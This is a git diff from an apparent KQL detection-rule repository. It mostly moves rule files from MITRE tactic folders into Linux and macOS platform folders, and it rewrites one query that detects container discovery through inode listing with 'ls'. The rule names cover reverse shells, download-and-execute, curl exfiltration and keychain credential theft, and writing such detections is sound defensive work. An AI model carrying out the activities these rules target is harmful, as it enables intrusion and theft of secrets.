a/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql b/KQL/rules/linux/process_creation/inline_python_execution_spawn_shell_via_os_system_library.kql similarity index 100% rename from KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql rename to KQL/rules/linux/process_creation/inline_python_execution_spawn_shell_via_os_system_library.kql diff --git a/KQL/rules/Defense Evasion/install_root_certificate.kql b/KQL/rules/linux/process_creation/install_root_certificate.kql similarity index 100% rename from KQL/rules/Defense Evasion/install_root_certificate.kql rename to KQL/rules/linux/process_creation/install_root_certificate.kql diff --git a/KQL/rules/Execution/interactive_bash_suspicious_children.kql b/KQL/rules/linux/process_creation/interactive_bash_suspicious_children.kql similarity index 100% rename from KQL/rules/Execution/interactive_bash_suspicious_children.kql rename to KQL/rules/linux/process_creation/interactive_bash_suspicious_children.kql diff --git a/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql b/KQL/rules/linux/process_creation/kaspersky_endpoint_security_stopped_via_commandline_linux.kql similarity index 100% rename from KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql rename to KQL/rules/linux/process_creation/kaspersky_endpoint_security_stopped_via_commandline_linux.kql diff --git a/KQL/rules/Defense Evasion/linux_base64_encoded_pipe_to_shell.kql b/KQL/rules/linux/process_creation/linux_base64_encoded_pipe_to_shell.kql similarity index 100% rename from KQL/rules/Defense Evasion/linux_base64_encoded_pipe_to_shell.kql rename to KQL/rules/linux/process_creation/linux_base64_encoded_pipe_to_shell.kql diff --git a/KQL/rules/Defense Evasion/linux_base64_encoded_shebang_in_cli.kql b/KQL/rules/linux/process_creation/linux_base64_encoded_shebang_in_cli.kql similarity index 100% rename from KQL/rules/Defense Evasion/linux_base64_encoded_shebang_in_cli.kql rename to KQL/rules/linux/process_creation/linux_base64_encoded_shebang_in_cli.kql diff --git a/KQL/rules/Impact/linux_crypto_mining_indicators.kql b/KQL/rules/linux/process_creation/linux_crypto_mining_indicators.kql similarity index 100% rename from KQL/rules/Impact/linux_crypto_mining_indicators.kql rename to KQL/rules/linux/process_creation/linux_crypto_mining_indicators.kql diff --git a/KQL/rules/Defense Evasion/linux_doas_tool_execution.kql b/KQL/rules/linux/process_creation/linux_doas_tool_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/linux_doas_tool_execution.kql rename to KQL/rules/linux/process_creation/linux_doas_tool_execution.kql diff --git a/KQL/rules/Execution/linux_hacktool_execution.kql b/KQL/rules/linux/process_creation/linux_hacktool_execution.kql similarity index 100% rename from KQL/rules/Execution/linux_hacktool_execution.kql rename to KQL/rules/linux/process_creation/linux_hacktool_execution.kql diff --git a/KQL/rules/Discovery/linux_network_service_scanning_tools_execution.kql b/KQL/rules/linux/process_creation/linux_network_service_scanning_tools_execution.kql similarity index 100% rename from KQL/rules/Discovery/linux_network_service_scanning_tools_execution.kql rename to KQL/rules/linux/process_creation/linux_network_service_scanning_tools_execution.kql diff --git a/KQL/rules/Defense Evasion/linux_package_uninstall.kql b/KQL/rules/linux/process_creation/linux_package_uninstall.kql similarity index 100% rename from KQL/rules/Defense Evasion/linux_package_uninstall.kql rename to KQL/rules/linux/process_creation/linux_package_uninstall.kql diff --git a/KQL/rules/Reconnaissance/linux_recon_indicators.kql b/KQL/rules/linux/process_creation/linux_recon_indicators.kql similarity index 100% rename from KQL/rules/Reconnaissance/linux_recon_indicators.kql rename to KQL/rules/linux/process_creation/linux_recon_indicators.kql diff --git a/KQL/rules/Discovery/linux_remote_system_discovery.kql b/KQL/rules/linux/process_creation/linux_remote_system_discovery.kql similarity index 100% rename from KQL/rules/Discovery/linux_remote_system_discovery.kql rename to KQL/rules/linux/process_creation/linux_remote_system_discovery.kql diff --git a/KQL/rules/Defense Evasion/linux_shell_pipe_to_shell.kql b/KQL/rules/linux/process_creation/linux_shell_pipe_to_shell.kql similarity index 100% rename from KQL/rules/Defense Evasion/linux_shell_pipe_to_shell.kql rename to KQL/rules/linux/process_creation/linux_shell_pipe_to_shell.kql diff --git a/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql b/KQL/rules/linux/process_creation/linux_sudo_chroot_execution.kql similarity index 100% rename from KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql rename to KQL/rules/linux/process_creation/linux_sudo_chroot_execution.kql diff --git a/KQL/rules/Persistence/linux_webshell_indicators.kql b/KQL/rules/linux/process_creation/linux_webshell_indicators.kql similarity index 100% rename from KQL/rules/Persistence/linux_webshell_indicators.kql rename to KQL/rules/linux/process_creation/linux_webshell_indicators.kql diff --git a/KQL/rules/Discovery/local_groups_discovery_linux.kql b/KQL/rules/linux/process_creation/local_groups_discovery_linux.kql similarity index 100% rename from KQL/rules/Discovery/local_groups_discovery_linux.kql rename to KQL/rules/linux/process_creation/local_groups_discovery_linux.kql diff --git a/KQL/rules/Discovery/local_system_accounts_discovery_linux.kql b/KQL/rules/linux/process_creation/local_system_accounts_discovery_linux.kql similarity index 100% rename from KQL/rules/Discovery/local_system_accounts_discovery_linux.kql rename to KQL/rules/linux/process_creation/local_system_accounts_discovery_linux.kql diff --git a/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql b/KQL/rules/linux/process_creation/mask_system_power_settings_via_systemctl.kql similarity index 100% rename from KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql rename to KQL/rules/linux/process_creation/mask_system_power_settings_via_systemctl.kql diff --git a/KQL/rules/Credential Access/mount_execution_with_hidepid_parameter.kql b/KQL/rules/linux/process_creation/mount_execution_with_hidepid_parameter.kql similarity index 100% rename from KQL/rules/Credential Access/mount_execution_with_hidepid_parameter.kql rename to KQL/rules/linux/process_creation/mount_execution_with_hidepid_parameter.kql diff --git a/KQL/rules/Execution/named_pipe_created_via_mkfifo.kql b/KQL/rules/linux/process_creation/named_pipe_created_via_mkfifo.kql similarity index 100% rename from KQL/rules/Execution/named_pipe_created_via_mkfifo.kql rename to KQL/rules/linux/process_creation/named_pipe_created_via_mkfifo.kql diff --git a/KQL/rules/Execution/nohup_execution.kql b/KQL/rules/linux/process_creation/nohup_execution.kql similarity index 100% rename from KQL/rules/Execution/nohup_execution.kql rename to KQL/rules/linux/process_creation/nohup_execution.kql diff --git a/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql b/KQL/rules/linux/process_creation/os_architecture_discovery_via_grep.kql similarity index 100% rename from KQL/rules/Discovery/os_architecture_discovery_via_grep.kql rename to KQL/rules/linux/process_creation/os_architecture_discovery_via_grep.kql diff --git a/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql b/KQL/rules/linux/process_creation/pnscan_binary_data_transmission_activity.kql similarity index 100% rename from KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql rename to KQL/rules/linux/process_creation/pnscan_binary_data_transmission_activity.kql diff --git a/KQL/rules/Discovery/potential_container_discovery_via_inodes_listing.kql b/KQL/rules/linux/process_creation/potential_container_discovery_via_inodes_listing.kql similarity index 68% rename from KQL/rules/Discovery/potential_container_discovery_via_inodes_listing.kql rename to KQL/rules/linux/process_creation/potential_container_discovery_via_inodes_listing.kql index 108b5468..8b394baf 100644 --- a/KQL/rules/Discovery/potential_container_discovery_via_inodes_listing.kql +++ b/KQL/rules/linux/process_creation/potential_container_discovery_via_inodes_listing.kql @@ -10,4 +10,4 @@ // - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered DeviceProcessEvents -| where ((ProcessCommandLine contains " -" and ProcessCommandLine contains "i") and (ProcessCommandLine contains " -" and ProcessCommandLine contains "d")) and ProcessCommandLine endswith " /" and FolderPath endswith "/ls" \ No newline at end of file +| where (ProcessCommandLine endswith " /" or ProcessCommandLine contains " / ") and FolderPath endswith "/ls" and ProcessCommandLine matches regex "(?:\\s-[^-\\s]{0,20}d|\\s--directory\\s)" and ProcessCommandLine matches regex "(?:\\s-[^-\\s]{0,20}i|\\s--inode\\s)" \ No newline at end of file diff --git a/KQL/rules/Discovery/potential_discovery_activity_using_find_linux.kql b/KQL/rules/linux/process_creation/potential_discovery_activity_using_find_linux.kql similarity index 100% rename from KQL/rules/Discovery/potential_discovery_activity_using_find_linux.kql rename to KQL/rules/linux/process_creation/potential_discovery_activity_using_find_linux.kql diff --git a/KQL/rules/Discovery/potential_gobrat_file_discovery_via_grep.kql b/KQL/rules/linux/process_creation/potential_gobrat_file_discovery_via_grep.kql similarity index 100% rename from KQL/rules/Discovery/potential_gobrat_file_discovery_via_grep.kql rename to KQL/rules/linux/process_creation/potential_gobrat_file_discovery_via_grep.kql diff --git a/KQL/rules/Command and Control/potential_linux_amazon_ssm_agent_hijacking.kql b/KQL/rules/linux/process_creation/potential_linux_amazon_ssm_agent_hijacking.kql similarity index 100% rename from KQL/rules/Command and Control/potential_linux_amazon_ssm_agent_hijacking.kql rename to KQL/rules/linux/process_creation/potential_linux_amazon_ssm_agent_hijacking.kql diff --git a/KQL/rules/Privilege Escalation/potential_linux_process_code_injection_via_dd_utility.kql b/KQL/rules/linux/process_creation/potential_linux_process_code_injection_via_dd_utility.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_linux_process_code_injection_via_dd_utility.kql rename to KQL/rules/linux/process_creation/potential_linux_process_code_injection_via_dd_utility.kql diff --git a/KQL/rules/Execution/potential_netcat_reverse_shell_execution.kql b/KQL/rules/linux/process_creation/potential_netcat_reverse_shell_execution.kql similarity index 100% rename from KQL/rules/Execution/potential_netcat_reverse_shell_execution.kql rename to KQL/rules/linux/process_creation/potential_netcat_reverse_shell_execution.kql diff --git a/KQL/rules/Execution/potential_perl_reverse_shell_execution.kql b/KQL/rules/linux/process_creation/potential_perl_reverse_shell_execution.kql similarity index 100% rename from KQL/rules/Execution/potential_perl_reverse_shell_execution.kql rename to KQL/rules/linux/process_creation/potential_perl_reverse_shell_execution.kql diff --git a/KQL/rules/Execution/potential_php_reverse_shell.kql b/KQL/rules/linux/process_creation/potential_php_reverse_shell.kql similarity index 100% rename from KQL/rules/Execution/potential_php_reverse_shell.kql rename to KQL/rules/linux/process_creation/potential_php_reverse_shell.kql diff --git a/KQL/rules/Execution/potential_ruby_reverse_shell.kql b/KQL/rules/linux/process_creation/potential_ruby_reverse_shell.kql similarity index 100% rename from KQL/rules/Execution/potential_ruby_reverse_shell.kql rename to KQL/rules/linux/process_creation/potential_ruby_reverse_shell.kql diff --git a/KQL/rules/Impact/potential_suspicious_change_to_sensitive_critical_files.kql b/KQL/rules/linux/process_creation/potential_suspicious_change_to_sensitive_critical_files.kql similarity index 100% rename from KQL/rules/Impact/potential_suspicious_change_to_sensitive_critical_files.kql rename to KQL/rules/linux/process_creation/potential_suspicious_change_to_sensitive_critical_files.kql diff --git a/KQL/rules/Execution/potential_xterm_reverse_shell.kql b/KQL/rules/linux/process_creation/potential_xterm_reverse_shell.kql similarity index 100% rename from KQL/rules/Execution/potential_xterm_reverse_shell.kql rename to KQL/rules/linux/process_creation/potential_xterm_reverse_shell.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_tmp_folder.kql b/KQL/rules/linux/process_creation/potentially_suspicious_execution_from_tmp_folder.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_execution_from_tmp_folder.kql rename to KQL/rules/linux/process_creation/potentially_suspicious_execution_from_tmp_folder.kql diff --git a/KQL/rules/Execution/potentially_suspicious_named_pipe_created_via_mkfifo.kql b/KQL/rules/linux/process_creation/potentially_suspicious_named_pipe_created_via_mkfifo.kql similarity index 100% rename from KQL/rules/Execution/potentially_suspicious_named_pipe_created_via_mkfifo.kql rename to KQL/rules/linux/process_creation/potentially_suspicious_named_pipe_created_via_mkfifo.kql diff --git a/KQL/rules/Reconnaissance/print_history_file_contents.kql b/KQL/rules/linux/process_creation/print_history_file_contents.kql similarity index 100% rename from KQL/rules/Reconnaissance/print_history_file_contents.kql rename to KQL/rules/linux/process_creation/print_history_file_contents.kql diff --git a/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql b/KQL/rules/linux/process_creation/pua_trufflehog_execution_linux.kql similarity index 100% rename from KQL/rules/Discovery/pua_trufflehog_execution_linux.kql rename to KQL/rules/linux/process_creation/pua_trufflehog_execution_linux.kql diff --git a/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql b/KQL/rules/linux/process_creation/python_reverse_shell_execution_via_pty_and_socket_modules.kql similarity index 100% rename from KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql rename to KQL/rules/linux/process_creation/python_reverse_shell_execution_via_pty_and_socket_modules.kql diff --git a/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql b/KQL/rules/linux/process_creation/python_spawning_pretty_tty_via_pty_module.kql similarity index 100% rename from KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql rename to KQL/rules/linux/process_creation/python_spawning_pretty_tty_via_pty_module.kql diff --git a/KQL/rules/Exfiltration/python_webserver_execution_linux.kql b/KQL/rules/linux/process_creation/python_webserver_execution_linux.kql similarity index 100% rename from KQL/rules/Exfiltration/python_webserver_execution_linux.kql rename to KQL/rules/linux/process_creation/python_webserver_execution_linux.kql diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql b/KQL/rules/linux/process_creation/remote_access_tool_team_viewer_session_started_on_linux_host.kql similarity index 100% rename from KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql rename to KQL/rules/linux/process_creation/remote_access_tool_team_viewer_session_started_on_linux_host.kql diff --git a/KQL/rules/Defense Evasion/remove_immutable_file_attribute.kql b/KQL/rules/linux/process_creation/remove_immutable_file_attribute.kql similarity index 100% rename from KQL/rules/Defense Evasion/remove_immutable_file_attribute.kql rename to KQL/rules/linux/process_creation/remove_immutable_file_attribute.kql diff --git a/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql b/KQL/rules/linux/process_creation/remove_scheduled_cron_task_job.kql similarity index 100% rename from KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql rename to KQL/rules/linux/process_creation/remove_scheduled_cron_task_job.kql diff --git a/KQL/rules/Execution/scheduled_cron_task_job_linux.kql b/KQL/rules/linux/process_creation/scheduled_cron_task_job_linux.kql similarity index 100% rename from KQL/rules/Execution/scheduled_cron_task_job_linux.kql rename to KQL/rules/linux/process_creation/scheduled_cron_task_job_linux.kql diff --git a/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql b/KQL/rules/linux/process_creation/scheduled_task_job_at.kql similarity index 100% rename from KQL/rules/Privilege Escalation/scheduled_task_job_at.kql rename to KQL/rules/linux/process_creation/scheduled_task_job_at.kql diff --git a/KQL/rules/Discovery/security_software_discovery_linux.kql b/KQL/rules/linux/process_creation/security_software_discovery_linux.kql similarity index 100% rename from KQL/rules/Discovery/security_software_discovery_linux.kql rename to KQL/rules/linux/process_creation/security_software_discovery_linux.kql diff --git a/KQL/rules/Defense Evasion/setuid_and_setgid.kql b/KQL/rules/linux/process_creation/setuid_and_setgid.kql similarity index 100% rename from KQL/rules/Defense Evasion/setuid_and_setgid.kql rename to KQL/rules/linux/process_creation/setuid_and_setgid.kql diff --git a/KQL/rules/Discovery/shell_execution_gcc_linux.kql b/KQL/rules/linux/process_creation/shell_execution_gcc_linux.kql similarity index 100% rename from KQL/rules/Discovery/shell_execution_gcc_linux.kql rename to KQL/rules/linux/process_creation/shell_execution_gcc_linux.kql diff --git a/KQL/rules/Execution/shell_execution_of_process_located_in_tmp_directory.kql b/KQL/rules/linux/process_creation/shell_execution_of_process_located_in_tmp_directory.kql similarity index 100% rename from KQL/rules/Execution/shell_execution_of_process_located_in_tmp_directory.kql rename to KQL/rules/linux/process_creation/shell_execution_of_process_located_in_tmp_directory.kql diff --git a/KQL/rules/Discovery/shell_execution_via_find_linux.kql b/KQL/rules/linux/process_creation/shell_execution_via_find_linux.kql similarity index 100% rename from KQL/rules/Discovery/shell_execution_via_find_linux.kql rename to KQL/rules/linux/process_creation/shell_execution_via_find_linux.kql diff --git a/KQL/rules/Discovery/shell_execution_via_flock_linux.kql b/KQL/rules/linux/process_creation/shell_execution_via_flock_linux.kql similarity index 100% rename from KQL/rules/Discovery/shell_execution_via_flock_linux.kql rename to KQL/rules/linux/process_creation/shell_execution_via_flock_linux.kql diff --git a/KQL/rules/Execution/shell_execution_via_git_linux.kql b/KQL/rules/linux/process_creation/shell_execution_via_git_linux.kql similarity index 100% rename from KQL/rules/Execution/shell_execution_via_git_linux.kql rename to KQL/rules/linux/process_creation/shell_execution_via_git_linux.kql diff --git a/KQL/rules/Discovery/shell_execution_via_nice_linux.kql b/KQL/rules/linux/process_creation/shell_execution_via_nice_linux.kql similarity index 100% rename from KQL/rules/Discovery/shell_execution_via_nice_linux.kql rename to KQL/rules/linux/process_creation/shell_execution_via_nice_linux.kql diff --git a/KQL/rules/Execution/shell_execution_via_rsync_linux.kql b/KQL/rules/linux/process_creation/shell_execution_via_rsync_linux.kql similarity index 100% rename from KQL/rules/Execution/shell_execution_via_rsync_linux.kql rename to KQL/rules/linux/process_creation/shell_execution_via_rsync_linux.kql diff --git a/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql b/KQL/rules/linux/process_creation/shell_invocation_via_apt_linux.kql similarity index 100% rename from KQL/rules/Discovery/shell_invocation_via_apt_linux.kql rename to KQL/rules/linux/process_creation/shell_invocation_via_apt_linux.kql diff --git a/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql b/KQL/rules/linux/process_creation/shell_invocation_via_env_command_linux.kql similarity index 100% rename from KQL/rules/Execution/shell_invocation_via_env_command_linux.kql rename to KQL/rules/linux/process_creation/shell_invocation_via_env_command_linux.kql diff --git a/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql b/KQL/rules/linux/process_creation/shell_invocation_via_ssh_linux.kql similarity index 100% rename from KQL/rules/Execution/shell_invocation_via_ssh_linux.kql rename to KQL/rules/linux/process_creation/shell_invocation_via_ssh_linux.kql diff --git a/KQL/rules/Command and Control/suspicious_curl_change_user_agents_linux.kql b/KQL/rules/linux/process_creation/suspicious_curl_change_user_agents_linux.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_curl_change_user_agents_linux.kql rename to KQL/rules/linux/process_creation/suspicious_curl_change_user_agents_linux.kql diff --git a/KQL/rules/Exfiltration/suspicious_curl_file_upload_linux.kql b/KQL/rules/linux/process_creation/suspicious_curl_file_upload_linux.kql similarity index 100% rename from KQL/rules/Exfiltration/suspicious_curl_file_upload_linux.kql rename to KQL/rules/linux/process_creation/suspicious_curl_file_upload_linux.kql diff --git a/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql b/KQL/rules/linux/process_creation/suspicious_download_and_execute_pattern_via_curl_wget.kql similarity index 100% rename from KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql rename to KQL/rules/linux/process_creation/suspicious_download_and_execute_pattern_via_curl_wget.kql diff --git a/KQL/rules/Reconnaissance/suspicious_git_clone_linux.kql b/KQL/rules/linux/process_creation/suspicious_git_clone_linux.kql similarity index 100% rename from KQL/rules/Reconnaissance/suspicious_git_clone_linux.kql rename to KQL/rules/linux/process_creation/suspicious_git_clone_linux.kql diff --git a/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql b/KQL/rules/linux/process_creation/suspicious_invocation_of_shell_via_awk_linux.kql similarity index 100% rename from KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql rename to KQL/rules/linux/process_creation/suspicious_invocation_of_shell_via_awk_linux.kql diff --git a/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql b/KQL/rules/linux/process_creation/suspicious_invocation_of_shell_via_rsync.kql similarity index 100% rename from KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql rename to KQL/rules/linux/process_creation/suspicious_invocation_of_shell_via_rsync.kql diff --git a/KQL/rules/Execution/suspicious_java_children_processes.kql b/KQL/rules/linux/process_creation/suspicious_java_children_processes.kql similarity index 100% rename from KQL/rules/Execution/suspicious_java_children_processes.kql rename to KQL/rules/linux/process_creation/suspicious_java_children_processes.kql diff --git a/KQL/rules/Execution/suspicious_nohup_execution.kql b/KQL/rules/linux/process_creation/suspicious_nohup_execution.kql similarity index 100% rename from KQL/rules/Execution/suspicious_nohup_execution.kql rename to KQL/rules/linux/process_creation/suspicious_nohup_execution.kql diff --git a/KQL/rules/Defense Evasion/suspicious_package_installed_linux.kql b/KQL/rules/linux/process_creation/suspicious_package_installed_linux.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_package_installed_linux.kql rename to KQL/rules/linux/process_creation/suspicious_package_installed_linux.kql diff --git a/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql b/KQL/rules/linux/process_creation/syslog_clearing_or_removal_via_system_utilities.kql similarity index 100% rename from KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql rename to KQL/rules/linux/process_creation/syslog_clearing_or_removal_via_system_utilities.kql diff --git a/KQL/rules/Discovery/system_information_discovery.kql b/KQL/rules/linux/process_creation/system_information_discovery.kql similarity index 100% rename from KQL/rules/Discovery/system_information_discovery.kql rename to KQL/rules/linux/process_creation/system_information_discovery.kql diff --git a/KQL/rules/Discovery/system_network_connections_discovery_linux.kql b/KQL/rules/linux/process_creation/system_network_connections_discovery_linux.kql similarity index 100% rename from KQL/rules/Discovery/system_network_connections_discovery_linux.kql rename to KQL/rules/linux/process_creation/system_network_connections_discovery_linux.kql diff --git a/KQL/rules/Discovery/system_network_discovery_linux.kql b/KQL/rules/linux/process_creation/system_network_discovery_linux.kql similarity index 100% rename from KQL/rules/Discovery/system_network_discovery_linux.kql rename to KQL/rules/linux/process_creation/system_network_discovery_linux.kql diff --git a/KQL/rules/Defense Evasion/touch_suspicious_service_file.kql b/KQL/rules/linux/process_creation/touch_suspicious_service_file.kql similarity index 100% rename from KQL/rules/Defense Evasion/touch_suspicious_service_file.kql rename to KQL/rules/linux/process_creation/touch_suspicious_service_file.kql diff --git a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_execve_hijack.kql b/KQL/rules/linux/process_creation/triple_cross_ebpf_rootkit_execve_hijack.kql similarity index 100% rename from KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_execve_hijack.kql rename to KQL/rules/linux/process_creation/triple_cross_ebpf_rootkit_execve_hijack.kql diff --git a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_install_commands.kql b/KQL/rules/linux/process_creation/triple_cross_ebpf_rootkit_install_commands.kql similarity index 100% rename from KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_install_commands.kql rename to KQL/rules/linux/process_creation/triple_cross_ebpf_rootkit_install_commands.kql diff --git a/KQL/rules/Defense Evasion/ufw_force_stop_using_ufw_init.kql b/KQL/rules/linux/process_creation/ufw_force_stop_using_ufw_init.kql similarity index 100% rename from KQL/rules/Defense Evasion/ufw_force_stop_using_ufw_init.kql rename to KQL/rules/linux/process_creation/ufw_force_stop_using_ufw_init.kql diff --git a/KQL/rules/Privilege Escalation/user_added_to_root_sudoers_group_using_usermod.kql b/KQL/rules/linux/process_creation/user_added_to_root_sudoers_group_using_usermod.kql similarity index 100% rename from KQL/rules/Privilege Escalation/user_added_to_root_sudoers_group_using_usermod.kql rename to KQL/rules/linux/process_creation/user_added_to_root_sudoers_group_using_usermod.kql diff --git a/KQL/rules/Impact/user_has_been_deleted_via_userdel.kql b/KQL/rules/linux/process_creation/user_has_been_deleted_via_userdel.kql similarity index 100% rename from KQL/rules/Impact/user_has_been_deleted_via_userdel.kql rename to KQL/rules/linux/process_creation/user_has_been_deleted_via_userdel.kql diff --git a/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql b/KQL/rules/linux/process_creation/vim_gtfobin_abuse_linux.kql similarity index 100% rename from KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql rename to KQL/rules/linux/process_creation/vim_gtfobin_abuse_linux.kql diff --git a/KQL/rules/Persistence/macos_emond_launch_daemon.kql b/KQL/rules/macos/file_event/macos_emond_launch_daemon.kql similarity index 100% rename from KQL/rules/Persistence/macos_emond_launch_daemon.kql rename to KQL/rules/macos/file_event/macos_emond_launch_daemon.kql diff --git a/KQL/rules/Persistence/startup_item_file_created_macos.kql b/KQL/rules/macos/file_event/startup_item_file_created_macos.kql similarity index 100% rename from KQL/rules/Persistence/startup_item_file_created_macos.kql rename to KQL/rules/macos/file_event/startup_item_file_created_macos.kql diff --git a/KQL/rules/Defense Evasion/binary_padding_macos.kql b/KQL/rules/macos/process_creation/binary_padding_macos.kql similarity index 100% rename from KQL/rules/Defense Evasion/binary_padding_macos.kql rename to KQL/rules/macos/process_creation/binary_padding_macos.kql diff --git a/KQL/rules/Collection/clipboard_data_collection_via_osascript.kql b/KQL/rules/macos/process_creation/clipboard_data_collection_via_osascript.kql similarity index 100% rename from KQL/rules/Collection/clipboard_data_collection_via_osascript.kql rename to KQL/rules/macos/process_creation/clipboard_data_collection_via_osascript.kql diff --git a/KQL/rules/Persistence/creation_of_a_local_user_account.kql b/KQL/rules/macos/process_creation/creation_of_a_local_user_account.kql similarity index 100% rename from KQL/rules/Persistence/creation_of_a_local_user_account.kql rename to KQL/rules/macos/process_creation/creation_of_a_local_user_account.kql diff --git a/KQL/rules/Credential Access/credentials_from_password_stores_keychain.kql b/KQL/rules/macos/process_creation/credentials_from_password_stores_keychain.kql similarity index 100% rename from KQL/rules/Credential Access/credentials_from_password_stores_keychain.kql rename to KQL/rules/macos/process_creation/credentials_from_password_stores_keychain.kql diff --git a/KQL/rules/Credential Access/credentials_in_files.kql b/KQL/rules/macos/process_creation/credentials_in_files.kql similarity index 100% rename from KQL/rules/Credential Access/credentials_in_files.kql rename to KQL/rules/macos/process_creation/credentials_in_files.kql diff --git a/KQL/rules/Defense Evasion/decode_base64_encoded_text_macos.kql b/KQL/rules/macos/process_creation/decode_base64_encoded_text_macos.kql similarity index 100% rename from KQL/rules/Defense Evasion/decode_base64_encoded_text_macos.kql rename to KQL/rules/macos/process_creation/decode_base64_encoded_text_macos.kql diff --git a/KQL/rules/Defense Evasion/disable_security_tools.kql b/KQL/rules/macos/process_creation/disable_security_tools.kql similarity index 100% rename from KQL/rules/Defense Evasion/disable_security_tools.kql rename to KQL/rules/macos/process_creation/disable_security_tools.kql diff --git a/KQL/rules/Exfiltration/disk_image_creation_via_hdiutil_macos.kql b/KQL/rules/macos/process_creation/disk_image_creation_via_hdiutil_macos.kql similarity index 100% rename from KQL/rules/Exfiltration/disk_image_creation_via_hdiutil_macos.kql rename to KQL/rules/macos/process_creation/disk_image_creation_via_hdiutil_macos.kql diff --git a/KQL/rules/Initial Access/disk_image_mounting_via_hdiutil_macos.kql b/KQL/rules/macos/process_creation/disk_image_mounting_via_hdiutil_macos.kql similarity index 100% rename from KQL/rules/Initial Access/disk_image_mounting_via_hdiutil_macos.kql rename to KQL/rules/macos/process_creation/disk_image_mounting_via_hdiutil_macos.kql diff --git a/KQL/rules/Discovery/file_and_directory_discovery_macos.kql b/KQL/rules/macos/process_creation/file_and_directory_discovery_macos.kql similarity index 100% rename from KQL/rules/Discovery/file_and_directory_discovery_macos.kql rename to KQL/rules/macos/process_creation/file_and_directory_discovery_macos.kql diff --git a/KQL/rules/Defense Evasion/file_download_via_nscurl_macos.kql b/KQL/rules/macos/process_creation/file_download_via_nscurl_macos.kql similarity index 100% rename from KQL/rules/Defense Evasion/file_download_via_nscurl_macos.kql rename to KQL/rules/macos/process_creation/file_download_via_nscurl_macos.kql diff --git a/KQL/rules/Defense Evasion/file_time_attribute_change.kql b/KQL/rules/macos/process_creation/file_time_attribute_change.kql similarity index 100% rename from KQL/rules/Defense Evasion/file_time_attribute_change.kql rename to KQL/rules/macos/process_creation/file_time_attribute_change.kql diff --git a/KQL/rules/Defense Evasion/gatekeeper_bypass_via_xattr.kql b/KQL/rules/macos/process_creation/gatekeeper_bypass_via_xattr.kql similarity index 100% rename from KQL/rules/Defense Evasion/gatekeeper_bypass_via_xattr.kql rename to KQL/rules/macos/process_creation/gatekeeper_bypass_via_xattr.kql diff --git a/KQL/rules/Privilege Escalation/guest_account_enabled_via_sysadminctl.kql b/KQL/rules/macos/process_creation/guest_account_enabled_via_sysadminctl.kql similarity index 100% rename from KQL/rules/Privilege Escalation/guest_account_enabled_via_sysadminctl.kql rename to KQL/rules/macos/process_creation/guest_account_enabled_via_sysadminctl.kql diff --git a/KQL/rules/Collection/gui_input_capture_macos.kql b/KQL/rules/macos/process_creation/gui_input_capture_macos.kql similarity index 100% rename from KQL/rules/Collection/gui_input_capture_macos.kql rename to KQL/rules/macos/process_creation/gui_input_capture_macos.kql diff --git a/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql b/KQL/rules/macos/process_creation/hidden_flag_set_on_file_directory_via_chflags_macos.kql similarity index 100% rename from KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql rename to KQL/rules/macos/process_creation/hidden_flag_set_on_file_directory_via_chflags_macos.kql diff --git a/KQL/rules/Defense Evasion/hidden_user_creation.kql b/KQL/rules/macos/process_creation/hidden_user_creation.kql similarity index 100% rename from KQL/rules/Defense Evasion/hidden_user_creation.kql rename to KQL/rules/macos/process_creation/hidden_user_creation.kql diff --git a/KQL/rules/Defense Evasion/indicator_removal_on_host_clear_mac_system_logs.kql b/KQL/rules/macos/process_creation/indicator_removal_on_host_clear_mac_system_logs.kql similarity index 100% rename from KQL/rules/Defense Evasion/indicator_removal_on_host_clear_mac_system_logs.kql rename to KQL/rules/macos/process_creation/indicator_removal_on_host_clear_mac_system_logs.kql diff --git a/KQL/rules/Execution/jamf_mdm_execution.kql 